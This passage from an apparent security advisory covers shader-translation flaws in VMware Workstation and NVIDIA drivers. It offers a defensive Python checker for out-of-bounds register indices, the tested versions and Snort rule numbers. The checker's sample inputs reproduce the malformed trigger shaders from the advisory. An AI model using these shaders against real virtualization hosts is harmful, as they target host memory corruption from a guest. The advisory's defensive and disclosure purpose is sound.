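All four issues above (sections 2.5, 3.5, 4.5 and 5.5) share one root cause: an instruction operand indexes a register that the shader's own declarations never made valid (RESOURCE[26112] against a lone DCL_RESOURCE RESOURCE[0], RESOURCE[46] against RESOURCE[5], x2[52278] against dcl_indexableTemp x2[3], x1[39385] against x1[65]), and the mismatch is not caught before the bytecode reaches the host-side translator and GPU driver. The following Python script is an added example, not code from Cisco Talos, VMware or NVIDIA: it performs that declaration-versus-use check over the disassembly text quoted in this advisory and rejects each of the four shaders. The two disassembly dialects it recognises and the sample shaders (shortened where the advisory itself shows "...") are reconstructed from the dumps on this page; how any other declaration type should be bounded is an assumption of the example.

```python
"""Static bounds check over guest-supplied shader disassembly.

Added example, not code from Cisco Talos, VMware or NVIDIA. It parses the two
disassembly dialects quoted in this advisory (VMware debug-log syntax such as
RESOURCE[n]/TEMP[n], and DXBC syntax such as dcl_indexableTemp xN[count]) and
reports every bracket-indexed operand not covered by its declaration.
"""
import re

ARRAY_DECLS = {"dcl_indexabletemp", "dcl_constantbuffer"}   # xN[count] -> count slots
SLOT_DECLS = {"dcl_resource", "dcl_sampler", "dcl_input_ps", "dcl_output"}  # one slot each
DECL_RE = re.compile(r"^(dcl_\w+)\s+(\w+)\[(\d+)\]", re.IGNORECASE)
TEMPS_RE = re.compile(r"^dcl_temps\s+(\d+)", re.IGNORECASE)
USE_RE = re.compile(r"(\w+)\[(\d+)\]")


def check_shader(text):
    """Return [(line_no, register, index), ...] for every operand written as
    NAME[n] whose n is not covered by NAME's declaration (undeclared NAME too)."""
    declared = {}          # lower-case register name -> set of valid indices
    violations = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        stmt = raw.strip()
        if not stmt or stmt == "..." or stmt.startswith("ps_"):
            continue       # blank line, elision marker, or profile header
        m = TEMPS_RE.match(stmt)
        if m:              # DCL_TEMPS n declares TEMP[0] .. TEMP[n-1]
            declared["temp"] = set(range(int(m.group(1))))
            continue
        m = DECL_RE.match(stmt)
        if m:
            mnemonic, reg, num = m.group(1).lower(), m.group(2).lower(), int(m.group(3))
            slots = declared.setdefault(reg, set())
            if mnemonic in ARRAY_DECLS:
                slots.update(range(num))     # indices 0 .. count-1 are valid
            elif mnemonic in SLOT_DECLS:
                slots.add(num)               # only this register number is valid
            continue
        if stmt.lower().startswith("dcl_"):
            continue       # other declaration; registers like r0/v0 carry no index
        for reg, idx in USE_RE.findall(stmt):
            if int(idx) not in declared.get(reg.lower(), set()):
                violations.append((line_no, reg, int(idx)))
    return violations


def is_clean(text):
    """True when the shader references only declared register slots."""
    return not check_shader(text)


# Constructed inputs: the shaders quoted in this advisory, one statement per
# line and shortened where the advisory itself shows "...".
SHADER_5521 = """\
ps_4_0
DCL_SAMPLER SAMPLER[0], DEFAULT
DCL_RESOURCE RESOURCE[0], TEXTURE2D, {FLOAT, FLOAT, FLOAT, FLOAT}
DCL_INPUT_PS INPUT[1].xy, LINEAR
DCL_OUTPUT OUTPUT[0].xyzw
DCL_TEMPS 1
SAMPLE TEMP[0].xyzw, INPUT[1].xyxx, RESOURCE[26112].xyzw, SAMPLER[0]
MOV OUTPUT[0].xyzw, TEMP[0].xyzw
RET
"""
SHADER_5684 = """\
ps_4_1
DCL_INPUT_PS INPUT[1].xy, LINEAR
DCL_TEMPS 3
DCL_RESOURCE RESOURCE[5], TEXTURE2DARRAY, {FLOAT, FLOAT, FLOAT, FLOAT}
DCL_SAMPLER SAMPLER[5], DEFAULT
MOV TEMP[0].xy, INPUT[1].xyxx
SAMPLE_AOFFIMMI(-1, 0, 0) TEMP[1].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5]
SAMPLE TEMP[2].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5]
RET
"""
SHADER_5685_WRITE = """\
ps_4_0
dcl_constantbuffer cb0[2], immediateIndexed
dcl_indexableTemp x1[3], 4
dcl_indexableTemp x2[3], 4
mov x1[2].x, l(0,0,0,0)
mov x2[52278].xyzw, x1[0].xyzz
mov x2[2].xyzw, x1[2].xyzz
"""
SHADER_5685_PTR = """\
ps_4_0
dcl_constantbuffer cb0[3], immediateIndexed
dcl_indexableTemp x1[65], 4
mov r17.xyz, v0.xyzw
mad r0.y, r17.xyzw, cb0[2].xxxx, cb0[2].yyyy
mov x1[14].x, l(1,1,1,1)
mov x1[39385].x, l(0,0,0,0)
"""

if __name__ == "__main__":
    for name, text in [("CVE-2019-5521", SHADER_5521), ("CVE-2019-5684", SHADER_5684),
                       ("CVE-2019-5685 write", SHADER_5685_WRITE),
                       ("CVE-2019-5685 ptr", SHADER_5685_PTR)]:
        for line_no, reg, idx in check_shader(text):
            print(f"{name}: line {line_no}: {reg}[{idx}] is outside its declaration")
```

Run directly, the script lists the four offending operands, one per shader (two for CVE-2019-5684, which samples RESOURCE[46] twice in the shortened form). A shader that passes is not thereby proven safe; it is only free of the specific index-versus-declaration mismatch this advisory describes, which is exactly the property a translator sitting between a guest and the host GPU driver should enforce before anything else.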
6. Tested Versions
Talos tested and confirmed that CVE-2019-5521 affects VMware Workstation 15 (15.0.2 build-10952284) with a Windows 10 x64 guest VM. The other three vulnerabilities affect NVWGF2UMX_CFG.DLL version 25.21.14.2531, NVIDIA D3D10 driver version 425.31 (with an NVIDIA Quadro K620) and VMware Workstation 15 (15.0.4 build-12990004, guest VM running Windows 10 x64).
7. Coverage
The following SNORT rules detect attempts to exploit these vulnerabilities. Note that additional rules may be released in the future, and the current rules may change as new vulnerability information becomes available. For the latest rule information, refer to your Firepower Management Center or Snort.org.
Snort rules: 48852, 48853, 49894, 49895, 49896, 49897, 49205, 49206